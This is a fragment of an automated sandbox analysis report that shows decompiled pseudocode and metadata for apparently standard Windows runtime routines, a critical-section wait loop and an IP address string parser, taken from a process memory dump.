                                                    						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                    						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                    						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                    							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                    							_v66 = 0x1722;
                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                    							_t76 =  &_v72;
                                                    							_push( &_v72);
                                                    							_v28 = _t85;
                                                    							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                    							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                    							_push(0x10);
                                                    							_push(0x20402);
                                                    							E021F01A4( *0x7ffe0382 & 0x000000ff);
                                                    						}
                                                    						while(1) {
                                                    							_t43 = _v8;
                                                    							_push(_t80);
                                                    							_push(0);
                                                    							__eflags = _t43 - 0xffffffff;
                                                    							if(_t43 == 0xffffffff) {
                                                    								_t71 =  *0x22d793c; // 0x0
                                                    								_push(_t85);
                                                    								_t44 = E021F1F28(_t71);
                                                    							} else {
                                                    								_t44 = E021EF8CC(_t43);
                                                    							}
                                                    							__eflags = _t44 - 0x102;
                                                    							if(_t44 != 0x102) {
                                                    								__eflags = _t44;
                                                    								if(__eflags < 0) {
                                                    									_push(_t44);
                                                    									E02233915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                    									asm("int3");
                                                    									E02272306(_t85);
                                                    									__eflags = _t67 & 0x00000002;
                                                    									if((_t67 & 0x00000002) != 0) {
                                                    										_t7 = _t67 + 2; // 0x4
                                                    										_t72 = _t7;
                                                    										asm("lock cmpxchg [edi], ecx");
                                                    										__eflags = _t67 - _t67;
                                                    										if(_t67 == _t67) {
                                                    											E0221EC56(_t72, _t76, _t80, _t85);
                                                    										}
                                                    									}
                                                    									return 0;
                                                    								} else {
                                                    									__eflags = _v24;
                                                    									if(_v24 != 0) {
                                                    										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                    									}
                                                    									return 2;
                                                    								}
                                                    								goto L36;
                                                    							}
                                                    							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                    							_push(_t67);
                                                    							_t46 = E02234FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                    							_push(_t77);
                                                    							E02243F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                    							_t48 =  *_t85;
                                                    							_t92 = _t91 + 0x18;
                                                    							__eflags = _t48 - 0xffffffff;
                                                    							if(_t48 == 0xffffffff) {
                                                    								_t49 = 0;
                                                    								__eflags = 0;
                                                    							} else {
                                                    								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                    							}
                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                    							_push(_t49);
                                                    							_t50 = _v12;
                                                    							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                    							_push(_t85);
                                                    							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                    							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                    							E02243F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                    							_t53 =  *_t85;
                                                    							_t93 = _t92 + 0x20;
                                                    							_t67 = _t67 + 1;
                                                    							__eflags = _t53 - 0xffffffff;
                                                    							if(_t53 != 0xffffffff) {
                                                    								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                    								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                    							}
                                                    							__eflags = _t67 - 2;
                                                    							if(_t67 > 2) {
                                                    								__eflags = _t85 - 0x22d20c0;
                                                    								if(_t85 != 0x22d20c0) {
                                                    									_t76 = _a4;
                                                    									__eflags = _a4 - _a8;
                                                    									if(__eflags == 0) {
                                                    										E0227217A(_t71, __eflags, _t85);
                                                    									}
                                                    								}
                                                    							}
                                                    							_push("RTL: Re-Waiting\n");
                                                    							_push(0);
                                                    							_push(0x65);
                                                    							_a8 = _a4;
                                                    							E02243F92();
                                                    							_t91 = _t93 + 0xc;
                                                    							__eflags =  *0x7ffe0382;
                                                    							if( *0x7ffe0382 != 0) {
                                                    								goto L21;
                                                    							}
                                                    						}
                                                    						goto L36;
                                                    					}
                                                    				} else {
                                                    					return _t40;
                                                    				}
                                                    				L36:
                                                    			}

                                                    Strings
                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0225248D
                                                    • RTL: Re-Waiting, xrefs: 022524FA
                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 022524BD
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                    • API String ID: 0-3177188983
                                                    • Opcode ID: 6f414fec3b706bb5c0d9b30512d4b8c236d0076c4f7fb9edec130bb1393517b2
                                                    • Instruction ID: 22a58830d38570de28534279b9b524864636b11aedf734d44609b80715af5252
                                                    • Opcode Fuzzy Hash: 6f414fec3b706bb5c0d9b30512d4b8c236d0076c4f7fb9edec130bb1393517b2
                                                    • Instruction Fuzzy Hash: A841B2B0A20215EBD724DFE8CC84F6A77EAAF44720F108705FE659B2C8D774E9418B61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0222FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed int _v24;
                                                    				signed int _v28;
                                                    				signed int _t105;
                                                    				void* _t110;
                                                    				char _t114;
                                                    				short _t115;
                                                    				void* _t118;
                                                    				signed short* _t119;
                                                    				short _t120;
                                                    				char _t122;
                                                    				void* _t127;
                                                    				void* _t130;
                                                    				signed int _t136;
                                                    				intOrPtr _t143;
                                                    				signed int _t158;
                                                    				signed short* _t164;
                                                    				signed int _t167;
                                                    				void* _t170;
                                                    
                                                    				_t158 = 0;
                                                    				_t164 = _a4;
                                                    				_v20 = 0;
                                                    				_v24 = 0;
                                                    				_v8 = 0;
                                                    				_v12 = 0;
                                                    				_v16 = 0;
                                                    				_v28 = 0;
                                                    				_t136 = 0;
                                                    				while(1) {
                                                    					_t167 =  *_t164 & 0x0000ffff;
                                                    					if(_t167 == _t158) {
                                                    						break;
                                                    					}
                                                    					_t118 = _v20 - _t158;
                                                    					if(_t118 == 0) {
                                                    						if(_t167 == 0x3a) {
                                                    							if(_v12 > _t158 || _v8 > _t158) {
                                                    								break;
                                                    							} else {
                                                    								_t119 =  &(_t164[1]);
                                                    								if( *_t119 != _t167) {
                                                    									break;
                                                    								}
                                                    								_t143 = 2;
                                                    								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                    								_v28 = 1;
                                                    								_v8 = _t143;
                                                    								_t136 = _t136 + 1;
                                                    								L47:
                                                    								_t164 = _t119;
                                                    								_v20 = _t143;
                                                    								L14:
                                                    								if(_v24 == _t158) {
                                                    									L19:
                                                    									_t164 =  &(_t164[1]);
                                                    									_t158 = 0;
                                                    									continue;
                                                    								}
                                                    								if(_v12 == _t158) {
                                                    									if(_v16 > 4) {
                                                    										L29:
                                                    										return 0xc000000d;
                                                    									}
                                                    									_t120 = E0222EE02(_v24, _t158, 0x10);
                                                    									_t170 = _t170 + 0xc;
                                                    									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                    									_t136 = _t136 + 1;
                                                    									goto L19;
                                                    								}
                                                    								if(_v16 > 3) {
                                                    									goto L29;
                                                    								}
                                                    								_t122 = E0222EE02(_v24, _t158, 0xa);
                                                    								_t170 = _t170 + 0xc;
                                                    								if(_t122 > 0xff) {
                                                    									goto L29;
                                                    								}
                                                    								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                    								goto L19;
                                                    							}
                                                    						}
                                                    						L21:
                                                    						if(_v8 > 7 || _t167 >= 0x80) {
                                                    							break;
                                                    						} else {
                                                    							if(E0222685D(_t167, 4) == 0) {
                                                    								if(E0222685D(_t167, 0x80) != 0) {
                                                    									if(_v12 > 0) {
                                                    										break;
                                                    									}
                                                    									_t127 = 1;
                                                    									_a7 = 1;
                                                    									_v24 = _t164;
                                                    									_v20 = 1;
                                                    									_v16 = 1;
                                                    									L36:
                                                    									if(_v20 == _t127) {
                                                    										goto L19;
                                                    									}
                                                    									_t158 = 0;
                                                    									goto L14;
                                                    								}
                                                    								break;
                                                    							}
                                                    							_a7 = 0;
                                                    							_v24 = _t164;
                                                    							_v20 = 1;
                                                    							_v16 = 1;
                                                    							goto L19;
                                                    						}
                                                    					}
                                                    					_t130 = _t118 - 1;
                                                    					if(_t130 != 0) {
                                                    						if(_t130 == 1) {
                                                    							goto L21;
                                                    						}
                                                    						_t127 = 1;
                                                    						goto L36;
                                                    					}
                                                    					if(_t167 >= 0x80) {
                                                    						L7:
                                                    						if(_t167 == 0x3a) {
                                                    							_t158 = 0;
                                                    							if(_v12 > 0 || _v8 > 6) {
                                                    								break;
                                                    							} else {
                                                    								_t119 =  &(_t164[1]);
                                                    								if( *_t119 != _t167) {
                                                    									_v8 = _v8 + 1;
                                                    									L13:
                                                    									_v20 = _t158;
                                                    									goto L14;
                                                    								}
                                                    								if(_v28 != 0) {
                                                    									break;
                                                    								}
                                                    								_v28 = _v8 + 1;
                                                    								_t143 = 2;
                                                    								_v8 = _v8 + _t143;
                                                    								goto L47;
                                                    							}
                                                    						}
                                                    						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                    							break;
                                                    						} else {
                                                    							_v12 = _v12 + 1;
                                                    							_t158 = 0;
                                                    							goto L13;
                                                    						}
                                                    					}
                                                    					if(E0222685D(_t167, 4) != 0) {
                                                    						_v16 = _v16 + 1;
                                                    						goto L19;
                                                    					}
                                                    					if(E0222685D(_t167, 0x80) != 0) {
                                                    						_v16 = _v16 + 1;
                                                    						if(_v12 > 0) {
                                                    							break;
                                                    						}
                                                    						_a7 = 1;
                                                    						goto L19;
                                                    					}
                                                    					goto L7;
                                                    				}
                                                    				 *_a8 = _t164;
                                                    				if(_v12 != 0) {
                                                    					if(_v12 != 3) {
                                                    						goto L29;
                                                    					}
                                                    					_v8 = _v8 + 1;
                                                    				}
                                                    				if(_v28 != 0 || _v8 == 7) {
                                                    					if(_v20 != 1) {
                                                    						if(_v20 != 2) {
                                                    							goto L29;
                                                    						}
                                                    						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                    						L65:
                                                    						_t105 = _v28;
                                                    						if(_t105 != 0) {
                                                    							_t98 = (_t105 - _v8) * 2; // 0x11
                                                    							E02208980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                    							_t110 = 8;
                                                    							E021FDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                    						}
                                                    						return 0;
                                                    					}
                                                    					if(_v12 != 0) {
                                                    						if(_v16 > 3) {
                                                    							goto L29;
                                                    						}
                                                    						_t114 = E0222EE02(_v24, 0, 0xa);
                                                    						_t170 = _t170 + 0xc;
                                                    						if(_t114 > 0xff) {
                                                    							goto L29;
                                                    						}
                                                    						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                    						goto L65;
                                                    					}
                                                    					if(_v16 > 4) {
                                                    						goto L29;
                                                    					}
                                                    					_t115 = E0222EE02(_v24, 0, 0x10);
                                                    					_t170 = _t170 + 0xc;
                                                    					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                    					goto L65;
                                                    				} else {
                                                    					goto L29;
                                                    				}
                                                    			}

Instruction addresses for the listing above (the address column of the two-column decompiler view, extracted in order; 0x00000000 marks lines without a mapped address):

0x0222fcd1 0x0222fcd6 0x0222fcd9 0x0222fcdc 0x0222fcdf 0x0222fce2 0x0222fce5 0x0222fce8 0x0222fceb 0x0222fced
0x0222fced 0x0222fcf3 0x00000000 0x00000000 0x0222fcfc 0x0222fcfe 0x0222fdc1 0x0225ecbd 0x00000000 0x0225eccc
0x0225eccc 0x0225ecd2 0x00000000 0x00000000 0x0225ecdf 0x0225ece0 0x0225ece4 0x0225eceb 0x0225ecee 0x0225eca8
0x0225eca8 0x0225ecaa 0x0222fd76 0x0222fd79 0x0222fdb4 0x0222fdb5 0x0222fdb6 0x00000000 0x0222fdb6 0x0222fd7e
0x0225ecfc 0x0222fe2f 0x00000000 0x0222fe2f 0x0225ed08 0x0225ed0f 0x0225ed17 0x0225ed1b 0x00000000 0x0225ed1b
0x0222fd88 0x00000000 0x00000000 0x0222fd94 0x0222fd99 0x0222fda1 0x00000000 0x00000000 0x0222fdb0 0x00000000
0x0222fdb0 0x0225ecbd 0x0222fdc7 0x0222fdcb 0x00000000 0x0222fdd7 0x0222fde3 0x0222fe06 0x02241fe7 0x00000000
0x00000000 0x02241fef 0x02241ff0 0x02241ff4 0x02241ff7 0x02241ffa 0x02241ffd 0x02242000 0x00000000 0x00000000
0x0225ecf1 0x00000000 0x0225ecf1 0x00000000 0x0222fe06 0x0222fde8 0x0222fdec 0x0222fdef 0x0222fdf2 0x00000000
0x0222fdf2 0x0222fdcb 0x0222fd04 0x0222fd05 0x0225ec67 0x00000000 0x00000000 0x0225ec6f 0x00000000 0x0225ec6f
0x0222fd13 0x0222fd3c 0x0222fd40 0x0225ec75 0x0225ec7a 0x00000000 0x0225ec8a 0x0225ec8a 0x0225ec90 0x0225ecb2
0x0222fd73 0x0222fd73 0x00000000 0x0222fd73 0x0225ec95 0x00000000 0x00000000 0x0225eca1 0x0225eca4 0x0225eca5
0x00000000 0x0225eca5 0x0225ec7a 0x0222fd4a 0x00000000 0x0222fd6e 0x0222fd6e 0x0222fd71 0x00000000 0x0222fd71
0x0222fd4a 0x0222fd21 0x0223a3a1 0x00000000 0x0223a3a1 0x0222fd36 0x0224200b 0x02242012 0x00000000 0x00000000
0x02242018 0x00000000 0x02242018 0x00000000 0x0222fd36 0x0222fe0f 0x0222fe16 0x0223a3ad 0x00000000 0x00000000
0x0223a3b3 0x0223a3b3 0x0222fe1f 0x0225ed25 0x0225ed86 0x00000000 0x00000000 0x0225ed91 0x0225ed95 0x0225ed95
0x0225ed9a 0x0225edad 0x0225edb3 0x0225edba 0x0225edc4 0x0225edc9 0x00000000 0x0225edcc 0x0225ed2a 0x0225ed55
0x00000000 0x00000000 0x0225ed61 0x0225ed66 0x0225ed6e 0x00000000 0x00000000 0x0225ed7d 0x00000000 0x0225ed7d
0x0225ed30 0x00000000 0x00000000 0x0225ed3c 0x0225ed43 0x0225ed4b 0x00000000 0x00000000 0x00000000 0x00000000

APIs
Memory Dump Source
• Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
• Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp
• Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp
• Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
Similarity
• API ID: __fassign
• String ID:
• API String ID: 3965848254-0
• Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction ID: aa123af848fae1f69e4302daccf16f3bda24eb7c1fff41e6021ee553a1aa6f81
• Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction Fuzzy Hash: 6791B031D2022AFEDF25CFD8C9447AEB7B4EF40308F20806AD805A6559E7725B49CB81
Uniqueness
• Uniqueness Score: -1.00%